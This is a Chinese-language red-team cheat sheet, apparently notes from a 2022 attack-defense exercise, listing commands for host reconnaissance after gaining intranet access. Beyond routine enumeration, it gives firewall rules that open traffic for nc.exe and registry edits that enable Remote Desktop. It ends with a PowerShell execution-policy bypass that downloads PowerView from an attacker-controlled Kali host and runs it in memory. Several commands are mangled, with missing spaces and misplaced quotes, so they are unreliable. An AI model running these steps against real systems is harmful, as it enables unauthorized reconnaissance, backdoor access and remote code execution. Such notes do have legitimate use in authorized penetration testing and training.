内网本机信息收集 · 2022护网笔记

[TOC] ## 目标 * 操作系统 * 系统版本 * 系统服务 * 系统端口 * 系统进程 * 系统补丁 * 内网IP地址段 * 系统权限 * 系统共享 * 网络连接 * 杀毒软件 * 用户角色 ## 查看网络配置 Windows ~~~ ipconfig /all ~~~ Linux ~~~ ifconfig ~~~ ## 查看操作系统信息 Windows ~~~ systeminfo | findstr OS ~~~ Linux ~~~ uname –a 或 cat /proc/version ~~~ ## 查看安装的软件及版本 Windows ~~~ wmic product get name,version ~~~ Linux ~~~ dpkg –l ：列出所有安装的文件和库 dpkg –l 软件名称：列举安装的版本 ~~~ ## 查看本机服务信息 Windows ~~~ wmic service list brief 或 net start ~~~ Linux ~~~ service --status-all ~~~ ## 查看进程列表 Windows ~~~ tasklist ~~~ Linux ~~~ ps –aux 或 ps –ef ~~~ ## 查看启动信息 Windows ~~~ wmic startup get command,caption ~~~ Linux ~~~ dmesg ~~~ ## 查看任务计划 Windows ~~~ at 或 schtasks ~~~ Linux ~~~ crontab -l ~~~ ## 查看开机时间 Windows ~~~ net statistics workstation ~~~ Linux ~~~ cat /proc/uptimedate -d "$(awk -F. '{print $1}' /proc/uptime) second ago" +"%Y-%m-%d%H:%M:%S" cat /proc/uptime| awk -F. '{run\_days=$1 / 86400;run\_hour=($1 %86400)/3600;run\_minute=($1 % 3600)/60;run\_second=$1 % 60;printf("系统已运行：%d天%d时%d分%d秒",run\_days,run\_hour,run\_minute,run\_second)} ~~~ ## 查看用户列表 Windows ~~~ 查看本即用户列表：net user 查看本地管理员信息：net localgroup administrators 查看当前在线用户：query user || qwinsta ~~~ Linux ~~~ 查看所有用户： cat /etc/passwd 查看用户组： cat /etc/group ~~~ ## 查看端口列表 Windows ~~~ netstat –ano ~~~ Linux ~~~ netstat –antpl ~~~ ## 查看补丁列表 Windows ~~~ systeminfo wmic qfe get caption,description,hotfixid,installedon ~~~ ## 查看本机共享列表 Windows ~~~ net share wmic share get name,path,status ~~~ ## 查看路由表及ARP信息 Windows ~~~ route print arp -a ~~~ Linux ~~~ arp –a route ~~~ ## 查看防火墙相关配置 ~~~ • 查看防火墙配置： netsh firewall show config • 打开防火墙配置： netsh advfirewall set allprofiles state on • 关闭防火墙配置： netsh advfirewall set allprofiles state off • 修改防火墙配置：允许程序入站 netsh advfirewall firewall add rule name= "pass nc" dir=in action=allow program="C:\\nc.exe" • 允许指定程序出站： netsh advfirewall firewall add rule name= "out nc" dir=out action=allowprogram="C:\\nc.exe" • 允许RDP(3389)端口放行： netsh advfirewall firewall add rule name= "RemoteDesktop" protocol=TCP dir=in localport=3389 action=allow ~~~ ## 查看注册表参数 ~~~ REG QUERY 命令参数（注册表） ~~~ ## 查看远程连接情况 ~~~ • 查看远程连接端口是否更改：很多时候RDP协议端口容易被更改 reg query "HKEY\_LOCAL\_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\WinStations\\RDP-Tcp" /v PortNumber • 打开远程桌面： REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal" "Server /vfDenyTSConnections /t REG\_DWORD /d 0 /f • 关闭远程桌面： REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal" "Server /vfDenyTSConnections /t REG\_DWORD /d 1 /f • 查看远程桌面开启状态： REG query HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal" "Server /vfDenyTSConnections /t REG\_DWORD ~~~ ## 查看当前用户权限 ~~~ whoami ~~~ ## 查看域信息 ~~~ • ipconfig /all ：查看网关地址、DNS的IP地址、域名、本即是否DNS服务器处于一个网段 • nslookup +域名：解析出的域名服务器的IP地址和DNS服务器IP是否一致； • systeminfo ：确定用户的登陆域 • 判断是否在主域： net time /domain • 查询当前登录域及登录用户信息： net config workstation ~~~ ## 绕过powershell本地权限能上传文件到服务器但没有权限不够 powershell的用法 ~~~ powershell.exe -executionpolicy bypass "import-module .\powerview.ps1;get-netuser" ~~~ 不能上传脚本到目标机器 ~~~ 1，能够访问到脚本 2，kali开启apche服务 3，文件复制到服务器根目录 4，chmod 777 /目录给与最高权限 powershell.exe -exec bypass -nop -c "iex(New-ObjectNet.webClient).DownloadString('http://192.168.11.101/powerview.ps1');get-netuser" ~~~